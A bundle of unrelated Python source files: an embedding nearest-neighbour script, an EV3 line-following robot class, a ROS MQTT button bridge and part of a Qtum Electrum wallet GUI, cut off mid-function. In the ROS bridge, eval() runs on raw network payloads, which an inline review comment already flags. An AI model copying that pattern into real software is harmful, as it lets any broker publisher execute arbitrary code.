        parser.add_option('-k', '--nearest-neighbors', dest='k',
            help='number of nearest neighbors to calculate (default: %default)',
            type='int', default=25)
        parser.add_option('--batch-size', dest='batch_size',
            type='int', default=25,
            help='number of points to process at once (default %default)')
        parser.add_option('--embedding-mode', dest='embedding_mode',
            type='choice', choices=[pyemblib.Mode.Text, pyemblib.Mode.Binary], default=pyemblib.Mode.Binary,
            help='embedding file is in text ({0}) or binary ({1}) format (default: %default)'.format(pyemblib.Mode.Text, pyemblib.Mode.Binary))
        parser.add_option('--partial-neighbors-file', dest='partial_neighbors_file',
            help='file with partially calculated nearest neighbors (for resuming long-running job)')
        parser.add_option('-l', '--logfile', dest='logfile',
            help='name of file to write log contents to (empty for stdout)',
            default=None)
        (options, args) = parser.parse_args()
        if len(args) != 1:
            parser.print_help()
            exit()
        (embf,) = args
        return embf, options
    embf, options = _cli()
    log.start(options.logfile)
    log.writeConfig([
        ('Input embedding file', embf),
        ('Input embedding file mode', options.embedding_mode),
        ('Output neighbor file', options.outputf),
        ('Ordered vocabulary file', options.vocabf),
        ('Number of nearest neighbors', options.k),
        ('Batch size', options.batch_size),
        ('Number of threads', options.threads),
        ('Partial nearest neighbors file for resuming', options.partial_neighbors_file),
    ], 'k Nearest Neighbor calculation with cosine similarity')
    t_sub = log.startTimer('Reading embeddings from %s...' % embf)
    emb = pyemblib.read(embf, mode=options.embedding_mode, errors='replace')
    log.stopTimer(t_sub, message='Read {0:,} embeddings in {1}s.\n'.format(len(emb), '{0:.2f}'))
    # NOTE(review): options.vocabf is required for the isfile() check below
    # but optparse does not enforce it — confirm callers always pass --vocab.
    if not os.path.isfile(options.vocabf):
        log.writeln('Writing node ID <-> vocab map to %s...\n' % options.vocabf)
        writeNodeMap(emb, options.vocabf)
    else:
        log.writeln('Reading node ID <-> vocab map from %s...\n' % options.vocabf)
    # BUGFIX: the original assigned node_map only in the else-branch, so a
    # fresh run (vocab file did not exist yet) crashed below with NameError.
    # Read the map back unconditionally after ensuring the file exists.
    node_map = readNodeMap(options.vocabf)
    # get the vocabulary in node ID order, and map index in emb_arr
    # to node IDs
    node_IDs = list(node_map.keys())
    node_IDs.sort()
    ordered_vocab = [
        node_map[node_ID]
        for node_ID in node_IDs
    ]
    emb_arr = np.array([
        emb[v] for v in ordered_vocab
    ])
    # Resume support: collect the indices already present in a partial output.
    if options.partial_neighbors_file:
        completed_neighbors = set()
        with open(options.partial_neighbors_file, 'r') as stream:
            for line in stream:
                if line[0] != '#':
                    (neighbor_id, _) = line.split(',', 1)
                    completed_neighbors.add(int(neighbor_id))
    else:
        completed_neighbors = set()
    log.writeln('Calculating k nearest neighbors.')
    KNearestNeighbors(
        emb_arr,
        node_IDs,
        options.k,
        options.outputf,
        threads=options.threads,
        batch_size=options.batch_size,
        completed_neighbors=completed_neighbors
    )
    log.writeln('Done!\n')
    log.stop()
|
robot.py | #!/usr/bin/env pybricks-micropython
from pybricks.hubs import EV3Brick
from pybricks.ev3devices import (Motor, TouchSensor, ColorSensor,
InfraredSensor, UltrasonicSensor, GyroSensor)
from pybricks.parameters import Port, Stop, Direction, Button, Color
from pybricks.tools import wait, StopWatch, DataLog
from pybricks.robotics import DriveBase
from pybricks.media.ev3dev import SoundFile, ImageFile, Font
from math import pi
from PID import PID
from time import time
from threading import Thread
class Robot():
    """High-level wrapper around a pybricks EV3 DriveBase with two color
    sensors and optional attachment-arm motors (FLL-style robot).

    Conventions visible in this class: distances are given in cm and
    converted to mm for pybricks; speeds are a percentage of the motors'
    1020 deg/s maximum; reflection thresholds come from calibrate().
    """
    def __init__(self, brick, left_motor, right_motor, left_sensor, right_sensor=None,
                 front_arm=None, back_arm=None, gyro=None, wheel_diameter=62.4, axle_track=150):
        """Store hardware handles and configure the drive base.

        wheel_diameter and axle_track are in mm (pybricks DriveBase units).
        """
        self.ev3 = brick
        self.left_motor = left_motor
        self.right_motor = right_motor
        self.front_arm = front_arm
        self.back_arm = back_arm
        self.left_color = left_sensor
        self.right_color = right_sensor
        self.gyro = gyro
        self.wheel_diameter = wheel_diameter
        self.axle_track = axle_track
        self.ev3.speaker.set_volume(100)
        self.ev3.screen.set_font(Font(size=14))
        # Default reflection calibration values; overwritten by calibrate().
        self.min_left = 5
        self.max_left = 67
        self.min_right = 4
        self.max_right = 74
        # Encoder degrees over which lf_* ramps up when accelerate=True.
        self.accelerate_encoder = 100
        self.drive_base = DriveBase(self.left_motor, self.right_motor,
                                    self.wheel_diameter, self.axle_track)
        self.drive_base.stop()
        # 80% of the 1020 deg/s maximum, truncated to a whole number.
        self.straight_speed = (80 * 1020/100) // 1
        self.drive_base.settings(straight_speed=self.straight_speed)
        # Completion flags used to join the alignment helper threads.
        self.first_thread = False
        self.second_thread = False
    def move_front_arm(self, speed=30, mode="angle", value=0, then=Stop.HOLD, wait=True):
        """Run the front arm by angle (deg) or time (s) at speed % of 1500 dps."""
        if self.front_arm == None:
            self.ev3.screen.print("No arm to move")
            self.ev3.speaker.beep(1000,3000)
            return
        dps = int(1500 * (speed / 100))
        if mode == "angle":
            self.front_arm.run_angle(dps, value, then, wait)
        elif mode == "time":
            # run_time takes milliseconds; value is given in seconds.
            self.front_arm.run_time(dps, value*1000, then, wait)
    def move_back_arm(self, speed=30, mode="angle", value=0, then=Stop.HOLD, wait=True):
        """Run the back arm by angle (deg) or time (s) at speed % of 1500 dps."""
        if self.back_arm == None:
            self.ev3.screen.print("No arm to move")
            self.ev3.speaker.beep(1000,3000)
            return
        dps = int(1500 * (speed / 100))
        if mode == "angle":
            self.back_arm.run_angle(dps, value, then, wait)
        elif mode == "time":
            self.back_arm.run_time(dps, value*1000, then, wait)
    def stop(self, then="Brake"):
        """Stop the drive base; then="Hold" actively holds, "Brake" brakes.

        NOTE(review): lf_distance/lf_cross call self.stop("BRAKE"), which
        matches neither branch below, so only drive_base.stop() runs there —
        confirm whether "Brake" was intended.
        """
        self.drive_base.stop()
        if then == "Hold":
            self.left_motor.hold()
            self.right_motor.hold()
        elif then == "Brake":
            self.left_motor.brake()
            self.right_motor.brake()
    def straight(self, distance, speed=80, brake=False):
        """Drive straight `distance` cm at `speed` percent of max."""
        speed = (speed * 1020/100) // 1
        self.drive_base.reset()
        # Only push new settings when the speed actually changed (the drive
        # base must be stopped to accept settings).
        if speed != self.straight_speed:
            self.drive_base.stop()
            self.drive_base.settings(straight_speed=speed)
            self.straight_speed = speed
        self.drive_base.straight(distance * 10)
        self.drive_base.stop()
        if brake:
            self.left_motor.brake()
            self.right_motor.brake()
        wait(10)
    def turn(self, angle, brake=True):
        """Turn in place by `angle` degrees using the drive base."""
        self.left_motor.reset_angle(0)
        self.right_motor.reset_angle(0)
        self.drive_base.turn(angle)
        self.drive_base.stop()
        if brake:
            self.left_motor.brake()
            self.right_motor.brake()
        #print((abs(self.left_motor.angle()) + abs(self.right_motor.angle())) // 2)
    def pivot(self, speed=50, degrees=90, brake=True):
        """Pivot around one wheel: positive degrees runs the left motor,
        negative the right."""
        speed = (speed * 1020/100) // 1
        self.left_motor.reset_angle(0)
        self.right_motor.reset_angle(0)
        if degrees > 0:
            self.left_motor.run_angle(speed=speed, rotation_angle=degrees)
        else:
            self.right_motor.run_angle(speed=speed, rotation_angle=degrees)
        if brake:
            self.left_motor.brake()
            self.right_motor.brake()
    def drive(self, speed=80, turn_rate=0, mode="degrees", value=1, brake=False):
        """Drive at speed %/turn_rate until a stop condition is met.

        mode="degrees": average wheel rotation reaches `value` degrees;
        mode="time": `value` seconds elapse;
        mode="line": a color sensor sees a line (value 1=left, 2=right,
        otherwise both).
        """
        speed = (speed * 1020/100) // 1
        self.drive_base.stop()
        self.drive_base.reset()
        self.drive_base.drive(speed, turn_rate)
        if mode == 'degrees':
            while (abs(self.left_motor.angle()) + abs(self.right_motor.angle())) / 2 < value:
                pass
        elif mode == 'time':
            start_time = time()
            while time() - start_time < value:
                pass
        elif mode == 'line':
            if value == 1:
                left_threshold = (self.min_left + 5)
                while self.left_color.reflection() > left_threshold:
                    pass
            elif value == 2:
                right_threshold = (self.min_right + 5)
                while self.right_color.reflection() > right_threshold:
                    pass
            else:
                right_threshold = (self.min_right + 5)
                left_threshold = (self.min_left + 5)
                while self.right_color.reflection() > right_threshold and \
                        self.left_color.reflection() > left_threshold:
                    pass
        if brake:
            self.drive_base.stop()
            self.left_motor.brake()
            self.right_motor.brake()
        wait(100)
    def lf_distance(self, port, speed=50, distance=0, accelerate=False, then="Nothing", pid_ks=(0.7, 0.1, 0.03), outer=False):
        """PID line-follow for `distance` cm using the sensor on `port`
        (1=left, 2=right); `outer` follows the opposite line edge."""
        pid = PID(pid_ks[0], pid_ks[1], pid_ks[2])
        pid.SetPoint = 0
        pid.setSampleTime(0.01)
        # Convert cm to encoder degrees via the wheel circumference.
        degrees = int(360 * (distance * 10 / (pi * self.wheel_diameter)))
        self.left_motor.reset_angle(0)
        self.right_motor.reset_angle(0)
        v = vmax = speed
        v0 = 30
        if port == 1:
            # Target midway between calibrated black/white, biased +10.
            target = (self.min_left + self.max_left) // 2 + 10
            sensor = self.left_color
            k = 1
        else:
            target = (self.min_right + self.max_right) // 2 + 10
            sensor = self.right_color
            k = -1
        if outer:
            k *= -1
        while (self.left_motor.angle() + self.right_motor.angle()) / 2 < degrees:
            if accelerate:
                # Ramp speed from v0 to vmax over accelerate_encoder degrees.
                v = int((self.left_motor.angle() / self.accelerate_encoder) * (vmax - v0) + v0)
                if v > vmax:
                    v = vmax
                    accelerate = False
            reflection_error = k*(sensor.reflection() - target)
            pid.update(reflection_error)
            u = int(pid.output)
            self.left_motor.dc(v - u)
            self.right_motor.dc(v + u)
        if then == "Brake":
            # NOTE(review): stop() recognizes "Hold"/"Brake", not "BRAKE".
            self.stop("BRAKE")
        elif then == "Coast":
            self.left_motor.dc(0)
            self.right_motor.dc(0)
    def lf_cross(self, port=1, speed=50, min_distance=0, accelerate=False, then="Brake", pid_ks=(0.7, 0.1, 0.03), outer=False):
        """Line-follow with the sensor on `port` until the other sensor sees
        a crossing line, but at least `min_distance` cm."""
        pid = PID(pid_ks[0], pid_ks[1], pid_ks[2])
        pid.SetPoint = 0
        pid.setSampleTime(0.01)
        degrees = int(360 * (min_distance * 10 / (pi * self.wheel_diameter)))
        self.left_motor.reset_angle(0)
        self.right_motor.reset_angle(0)
        v = vmax = speed
        v0 = 30
        if port == 1:
            target = (self.min_left + self.max_left) // 2 + 10
            sensor = self.left_color
            stop_sensor = self.right_color
            stop_target = self.min_right + 8
            k = 1
        else:
            target = (self.min_right + self.max_right) // 2 + 10
            stop_sensor = self.left_color
            sensor = self.right_color
            stop_target = self.min_left + 8
            k = -1
        if outer:
            k *= -1
        # Keep following while below min distance OR the stop sensor has not
        # yet hit a dark crossing line.
        while (self.left_motor.angle() + self.right_motor.angle()) / 2 < degrees or \
                stop_sensor.reflection() > stop_target:
            if accelerate:
                v = int((self.left_motor.angle() / self.accelerate_encoder) * (vmax - v0) + v0)
                if v > vmax:
                    v = vmax
                    accelerate = False
            reflection_error = k*(sensor.reflection() - target)
            pid.update(reflection_error)
            u = int(pid.output)
            self.left_motor.dc(v - u)
            self.right_motor.dc(v + u)
        if then == "Brake":
            # NOTE(review): stop() recognizes "Hold"/"Brake", not "BRAKE".
            self.stop("BRAKE")
        elif then == "Coast":
            self.left_motor.dc(0)
            self.right_motor.dc(0)
    def calibrate(self):
        """Interactive min/max reflection calibration for both sensors.

        Center button starts, Down stops sampling, Center again saves the
        observed extremes into min/max_left/right.
        """
        self.ev3.screen.clear()
        self.ev3.screen.print("press center to")
        self.ev3.screen.print("calibrate colors")
        while Button.CENTER not in self.ev3.buttons.pressed():
            wait(10)
        min_left = 100
        max_left = 0
        min_right = 100
        max_right = 0
        while Button.DOWN not in self.ev3.buttons.pressed():
            left_value = self.left_color.reflection()
            right_value = self.right_color.reflection()
            if left_value < min_left:
                min_left = left_value
            if left_value > max_left:
                max_left = left_value
            if right_value < min_right:
                min_right = right_value
            if right_value > max_right:
                max_right = right_value
            self.ev3.screen.clear()
            self.ev3.screen.print()
            self.ev3.screen.print("Left: " + str(left_value))
            self.ev3.screen.print("Right: " + str(right_value))
            self.ev3.screen.print("Down to stop")
            wait(40)
        self.ev3.screen.clear()
        self.ev3.screen.print()
        self.ev3.screen.print()
        self.ev3.screen.print("Min Left: " + str(min_left))
        self.ev3.screen.print("Max Left: " + str(max_left))
        self.ev3.screen.print("Min Right: " + str(min_right))
        self.ev3.screen.print("Max Right: " + str(max_right))
        self.ev3.screen.print("Center to exit")
        while Button.CENTER not in self.ev3.buttons.pressed():
            wait(50)
        self.min_left = min_left
        self.max_left = max_left
        self.min_right = min_right
        self.max_right = max_right
    def forward_align(self):
        """Square up on a line driving forward: each wheel independently seeks
        the line edge in a thread, then a PID alignment refines the pose."""
        self.drive_base.stop()
        t1 = Thread(target=self.left_line_thread, args=(200, self.left_motor, self.min_left + 5,
                    (self.max_left + self.min_left) // 2, self.left_color))
        t2 = Thread(target=self.right_line_thread, args=(200, self.right_motor, self.min_right + 5,
                    (self.max_right + self.min_right) // 2, self.right_color))
        self.first_thread = False
        self.second_thread = False
        t1.start()
        t2.start()
        # Busy-wait until both seek threads report completion.
        while self.first_thread == False or self.second_thread == False:
            pass
        self.pid_align(forward=True)
    def left_line_thread(self, dps, motor, min_threshold, max_threshold, color_sensor):
        """Drive one wheel until its sensor crosses the line, then back up to
        the edge; signals completion via self.first_thread."""
        self.first_thread = False
        motor.run(dps)
        is_stop = False
        while color_sensor.reflection() > min_threshold:
            pass
        # Overshot onto the line: reverse at half speed back to the edge.
        motor.run(-dps // 2)
        while color_sensor.reflection() < max_threshold:
            pass
        motor.brake()
        self.first_thread = True
    def right_line_thread(self, dps, motor, min_threshold, max_threshold, color_sensor):
        """Same as left_line_thread but signals via self.second_thread."""
        self.second_thread = False
        motor.run(dps)
        is_stop = False
        while color_sensor.reflection() > min_threshold:
            pass
        motor.run(-dps // 2)
        while color_sensor.reflection() < max_threshold:
            pass
        motor.brake()
        self.second_thread = True
    def backward_align(self):
        """Square up on a line driving backward (negative seek speed)."""
        self.drive_base.stop()
        t1 = Thread(target=self.left_line_thread, args=(-200, self.left_motor, self.min_left + 5,
                    (self.max_left + self.min_left) // 2, self.left_color))
        t2 = Thread(target=self.right_line_thread, args=(-200, self.right_motor, self.min_right + 5,
                    (self.max_right + self.min_right) // 2, self.right_color))
        self.first_thread = False
        self.second_thread = False
        t1.start()
        t2.start()
        while self.first_thread == False or self.second_thread == False:
            pass
        self.pid_align(forward=False)
    def pid_align(self, forward=True, dur=0.2, pid_ks=(1, 0.1, 0.03)):
        """Run per-wheel PID edge alignment concurrently for `dur` seconds."""
        left_thread = Thread(target=self.left_align, args=(forward, dur, pid_ks))
        right_thread = Thread(target=self.right_align, args=(forward, dur, pid_ks))
        self.first_thread = False
        self.second_thread = False
        left_thread.start()
        right_thread.start()
        while self.first_thread == False or self.second_thread == False:
            pass
    def left_align(self, forward=True, dur=5, pid_ks=(5, 0, 0)):
        """PID-servo the left wheel onto the line edge for `dur` seconds."""
        self.first_thread = False
        pid = PID(pid_ks[0], pid_ks[1], pid_ks[2])
        pid.SetPoint = 0
        pid.setSampleTime(0.01)
        start_time = time()
        left_threshold = (self.min_left + self.max_left) // 2
        # Direction sign flips depending on approach direction.
        k = 1
        if forward:
            k = -1
        while time() - start_time < dur:
            left_reflection_error = self.left_color.reflection() - left_threshold
            pid.update(left_reflection_error)
            left_u = int(pid.output)
            self.left_motor.run(k * left_u)
        self.left_motor.brake()
        self.first_thread = True
    def right_align(self, forward=True, dur=5, pid_ks=(0.6, 0.1, 0.02)):
        """PID-servo the right wheel onto the line edge for `dur` seconds."""
        self.second_thread = False
        pid = PID(pid_ks[0], pid_ks[1], pid_ks[2])
        pid.SetPoint = 0
        pid.setSampleTime(0.01)
        start_time = time()
        right_threshold = (self.min_right + self.max_right) // 2
        k = 1
        if forward:
            k = -1
        while time() - start_time < dur:
            right_reflection_error = self.right_color.reflection() - right_threshold
            pid.update(right_reflection_error)
            right_u = int(pid.output)
            self.right_motor.run(k * right_u)
        self.right_motor.brake()
        self.second_thread = True
    def control_motors(self, speed=600):
        """Manual arm jog mode: Up/Down selects front/back arm, Left/Right
        runs it, Center exits."""
        self.ev3.screen.clear()
        self.ev3.screen.print("Front -> UP")
        self.ev3.screen.print("Back -> DOWN")
        motor = self.front_arm
        while True:
            if Button.DOWN in self.ev3.buttons.pressed():
                motor = self.back_arm
                break
            if Button.UP in self.ev3.buttons.pressed():
                motor = self.front_arm
                break
        self.ev3.speaker.beep()
        self.ev3.screen.clear()
        self.ev3.screen.print("Left - Right")
        self.ev3.screen.print("buttons to move")
        self.ev3.screen.print("Center to exit")
        while True:
            if Button.LEFT in self.ev3.buttons.pressed():
                motor.run(speed)
            elif Button.RIGHT in self.ev3.buttons.pressed():
                motor.run(-speed)
            elif Button.CENTER in self.ev3.buttons.pressed():
                motor.stop()
                break
            else:
                motor.stop()
        self.ev3.speaker.beep()
|
button_listener.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import json
import math
import rospy
import socket
import threading
import fcntl
import struct
import uuid
import geometry_msgs.msg
import diagnostic_msgs.msg
from task_manager.msg import ButtonState
from task_manager.srv import TaskNewRequest
from task_manager.srv import TaskNew
import paho.mqtt.client as mqtt
button_dict={}
class StateListener:
    """Bridge MQTT call-button messages into ROS.

    Subscribes to two MQTT topics: button state messages are cached in the
    module-level button_dict and republished on a ROS topic; goal messages
    are converted into task_manager 'task_new' service calls.

    NOTE(review): this file targets Python 2 — StatePubLoop indexes
    dict.keys() directly, which fails on Python 3 dict views.
    """
    #global button_dict
    def __init__(self):
        # MQTT topic names and timing parameters come from the private
        # ROS parameter namespace.
        self.__sub_topic_name=rospy.get_param('~sub_topic_name',"iqr/callbutton/state")
        self.__sub_topic_name2=rospy.get_param('~sub_topic_name2',"iqr/callbutton/goal")
        self.__time_out=rospy.get_param('~time_out',10)
        self.__looprate=rospy.get_param('~looprate',1)
        self.robot_id = rospy.get_param('~mqtt_listener/client_id', "truck_01")
        self.client = mqtt.Client(client_id=self.robot_id)
        self.client.on_connect = self.on_connect
        self.client.on_message = self.on_message
        # NOTE(review): broker address/port are hard-coded — consider params.
        self.client.connect("192.168.40.122", 1883, 60)
        self.pub = rospy.Publisher('callbutton/state', ButtonState, queue_size=10)
        self._task_client = rospy.ServiceProxy("task_new", TaskNew)
    def UDPLinstenLoop(self):
        """Start the MQTT network loop in its background thread.

        NOTE(review): despite the name, this is MQTT, not UDP.
        """
        # rospy.loginfo("start udp linster..")
        self.client.loop_start()
    # The callback for when the client receives a CONNACK response from the server.
    def on_connect(self, client, userdata, flags, rc):
        """MQTT connect callback: subscribe and register per-topic callbacks."""
        print("Connected with result code "+str(rc))
        if rospy.is_shutdown():
            self.client.disconnect()
        # Subscribing in on_connect() means that if we lose the connection and
        # reconnect then subscriptions will be renewed.
        # self.client.subscribe([("iqr/default/callbutton/state", 0), ("iqr/default/agv_manager/state", 0)])
        self.client.subscribe([(self.__sub_topic_name,0),(self.__sub_topic_name2,0)])
        self.client.message_callback_add(self.__sub_topic_name, self.callback)
        self.client.message_callback_add(self.__sub_topic_name2, self.callback2)
        # message_callback_add(sub, callback)
    def callback(self, client, userdata, msg):
        """Handle a button-state message: cache it in button_dict keyed by id.

        NOTE(review/security): eval() on a raw network payload executes
        arbitrary code from the broker — this should be json.loads() on
        untrusted input; confirm payload format before changing.
        """
        # pass
        rospy.loginfo("callbutton/state callback ")
        #print(msg.payload)
        null="wrong"
        # msg_dict = "{"message_type": "state", "id": "btn_01", "state": "ready", "ip": "192.168.0.123", "mac_address": "FD:FD:FD:FD:FD:FD"}"
        try:
            eval(msg.payload)
        except Exception as e:
            print(repr(e))
            print("there is a wrong in jeson_msg")
        else:
            msg_dict = eval(msg.payload)
            # Stamp arrival time so StatePubLoop can expire stale entries.
            msg_dict["time"]=str(rospy.get_time())
            msg_id = msg_dict["id"]
            #msg_state = msg_dict["state"]
            #msg_ip = msg_dict["ip"]
            #msg_mac_address = msg_dict["mac_address"]
            button_dict[msg_id]=str(msg_dict)
            print(button_dict)
    def callback2(self, client, userdata, msg):
        """Handle a goal message: build a TaskNewRequest and call task_new.

        NOTE(review/security): same eval()-on-network-payload concern as
        callback() above.
        """
        # pass
        rospy.loginfo("callbutton/state callback ")
        #print(msg.payload)
        null="wrong"
        # msg_dict = "{"message_type": "state", "id": "btn_01", "state": "ready", "ip": "192.168.0.123", "mac_address": "FD:FD:FD:FD:FD:FD"}"
        try:
            eval(msg.payload)
        except Exception as e:
            print(repr(e))
            print("there is a wrong in jeson_msg")
        else:
            task_new_msg = TaskNewRequest()
            # print(type(task_new_msg.task_info))
            msg_dict2 = eval(msg.payload)
            priority = eval(str(msg_dict2["priority"]))
            sub_task = eval(str(msg_dict2["sub_task"]))
            param = eval(str(msg_dict2["param"]))
            print(msg_dict2)
            print(priority)
            print(sub_task)
            print(param)
            # NOTE(review): "maniplator" looks like a typo for "manipulator",
            # but it is a runtime protocol string — confirm with task_manager
            # before changing.
            task_new_msg.type = "maniplator"
            task_new_msg.priority = priority
            task_new_msg.sub_task = sub_task
            task_new_msg.param = param
            self._task_client.call(task_new_msg)
    # The callback for when a PUBLISH message is received from the server.
    def on_message(self, client, userdata, msg):
        """Fallback handler for topics without a specific callback: no-op."""
        rospy.loginfo("mqtt receive msg ")
        # print(msg.topic+" "+str(msg.payload))
        pass
    def StatePubLoop(self):
        """Periodically expire stale button entries and publish the remaining
        button states as one ButtonState message.

        NOTE(review): `lock` is local, so it does not synchronize with the
        MQTT callback thread that also mutates button_dict; and popping while
        iterating over key_list indices can skip entries or raise — confirm.
        """
        lock = threading.Lock()
        count = 0
        ButtonState_id_list=[]
        ButtonState_ip_list=[]
        ButtonState_state_list=[]
        ButtonState_mac_list=[]
        #looprate
        ButtonState_msg=ButtonState()
        rate = rospy.Rate(self.__looprate)
        while not rospy.is_shutdown():
            if button_dict!={}:
                #button_dict[b]
                key_list=button_dict.keys()
                for i in range(len(button_dict)):
                    single_button_dict=eval(button_dict[key_list[i]])
                    time_now=rospy.get_time()
                    # Drop entries not refreshed within the timeout window.
                    dlat=time_now-float(single_button_dict["time"])
                    if dlat>self.__time_out:
                        lock.acquire()
                        button_dict.pop(key_list[i])
                        lock.release()
            button_tuple=button_dict.items()  #transform dict to tuple
            for i in range(len(button_tuple)):
                single_button_dict=eval(button_tuple[i][1])
                ButtonState_id_list.append(single_button_dict["id"])
                ButtonState_ip_list.append(single_button_dict["ip"])
                ButtonState_state_list.append(single_button_dict["state"])
                ButtonState_mac_list.append(single_button_dict["mac_address"])
            ButtonState_msg.id=ButtonState_id_list
            ButtonState_msg.ip=ButtonState_ip_list
            ButtonState_msg.state=ButtonState_state_list
            ButtonState_msg.mac_address=ButtonState_mac_list
            ButtonState_msg.header.seq = count
            ButtonState_msg.header.stamp =rospy.Time.now()
            ButtonState_msg.header.frame_id = "ButtonState_msg"
            self.pub.publish(ButtonState_msg)
            # Reset the accumulators for the next publish cycle.
            ButtonState_id_list=[]
            ButtonState_ip_list=[]
            ButtonState_state_list=[]
            ButtonState_mac_list=[]
            count=count+1
            rate.sleep()
            #print(key_list)
            #print(button_dict)
def main():
    """Start the UDP listener and state-publisher threads, then spin ROS."""
    rospy.init_node('button_listener')
    listener = StateListener()
    udp_thread = threading.Thread(target=listener.UDPLinstenLoop, args=())
    pub_thread = threading.Thread(target=listener.StatePubLoop, args=())
    udp_thread.start()
    pub_thread.start()
    rospy.spin()
if __name__ == "__main__":
    try:
        main()
    except rospy.ROSInterruptException:
        # Normal shutdown path when ROS interrupts the node; nothing to clean up.
        pass
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import qtum_electrum
from qtum_electrum.bitcoin import TYPE_ADDRESS
from qtum_electrum import WalletStorage, Wallet
from qtum_electrum.gui.kivy.i18n import _
from qtum_electrum.paymentrequest import InvoiceStore
from qtum_electrum.util import profiler, InvalidPassword
from qtum_electrum.plugin import run_hook
from qtum_electrum.util import format_satoshis, format_satoshis_plain
from qtum_electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='qtum_electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from qtum_electrum.util import base_units
class ElectrumWindow(App):
    """Main Kivy application window for Qtum Electrum.

    Owns the wallet/network handles, mirrors network state into Kivy
    properties, and routes GUI events (QR scans, intents, dialogs) to the
    wallet and daemon.
    """

    electrum_config = ObjectProperty(None)
    language = StringProperty('en')

    # properties might be updated by the network
    num_blocks = NumericProperty(0)
    num_nodes = NumericProperty(0)
    server_host = StringProperty('')
    server_port = StringProperty('')
    num_chains = NumericProperty(0)
    blockchain_name = StringProperty('')
    blockchain_checkpoint = NumericProperty(0)

    auto_connect = BooleanProperty(False)

    def on_auto_connect(self, instance, x):
        # Kivy observer: push the new auto_connect flag to the network layer.
        host, port, protocol, proxy, auto_connect = self.network.get_parameters()
        self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)

    def toggle_auto_connect(self, x):
        self.auto_connect = not self.auto_connect

    def choose_server_dialog(self, popup):
        """Open a ChoiceDialog listing known servers; write the pick into *popup*."""
        from .uix.dialogs.choice_dialog import ChoiceDialog
        protocol = 's'
        def cb2(host):
            from qtum_electrum import constants
            pp = servers.get(host, constants.net.DEFAULT_PORTS)
            port = pp.get(protocol, '')
            popup.ids.host.text = host
            popup.ids.port.text = port
        servers = self.network.get_servers()
        ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()

    def choose_blockchain_dialog(self, dt):
        """Let the user pick which chain fork to follow when several exist."""
        from .uix.dialogs.choice_dialog import ChoiceDialog
        chains = self.network.get_blockchains()
        def cb(name):
            for index, b in self.network.blockchains.items():
                if name == self.network.get_blockchain_name(b):
                    self.network.follow_chain(index)
                    #self.block
        names = [self.network.blockchains[b].get_name() for b in chains]
        if len(names) >1:
            ChoiceDialog(_('Choose your chain'), names, '', cb).open()

    use_rbf = BooleanProperty(False)
    def on_use_rbf(self, instance, x):
        self.electrum_config.set_key('use_rbf', self.use_rbf, True)

    use_change = BooleanProperty(False)
    def on_use_change(self, instance, x):
        self.electrum_config.set_key('use_change', self.use_change, True)

    use_unconfirmed = BooleanProperty(False)
    def on_use_unconfirmed(self, instance, x):
        # config stores the inverse ("confirmed_only") of this property
        self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)

    def set_URI(self, uri):
        """Switch to the send tab and load a payment URI into it."""
        self.switch_to('send')
        self.send_screen.set_URI(uri)

    def on_new_intent(self, intent):
        # Android intent hook: only handle qtum: scheme URIs.
        if intent.getScheme() != 'qtum':
            return
        uri = intent.getDataString()
        self.set_URI(uri)

    def on_language(self, instance, language):
        Logger.info('language: {}'.format(language))
        _.switch_lang(language)

    def update_history(self, *dt):
        if self.history_screen:
            self.history_screen.update()

    def on_quotes(self, d):
        Logger.info("on_quotes")
        self._trigger_update_history()

    def on_history(self, d):
        Logger.info("on_history")
        self._trigger_update_history()

    def _get_bu(self):
        # getter for the base_unit AliasProperty
        return self.electrum_config.get('base_unit', 'mQTUM')

    def _set_bu(self, value):
        # setter for the base_unit AliasProperty: persist and refresh UI
        assert value in base_units.keys()
        self.electrum_config.set_key('base_unit', value, True)
        self._trigger_update_status()
        self._trigger_update_history()

    base_unit = AliasProperty(_get_bu, _set_bu)
    status = StringProperty('')
    fiat_unit = StringProperty('')

    def on_fiat_unit(self, a, b):
        self._trigger_update_history()

    def decimal_point(self):
        """Return the decimal precision implied by the current base unit."""
        return base_units[self.base_unit]

    def btc_to_fiat(self, amount_str):
        """Convert an amount string in the base unit to a fiat string ('' if no rate)."""
        if not amount_str:
            return ''
        rate = self.fx.exchange_rate()
        if not rate:
            return ''
        fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
        return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')

    def fiat_to_btc(self, fiat_amount):
        """Convert a fiat amount string to a coin amount string ('' if no rate)."""
        if not fiat_amount:
            return ''
        rate = self.fx.exchange_rate()
        if not rate:
            return ''
        satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
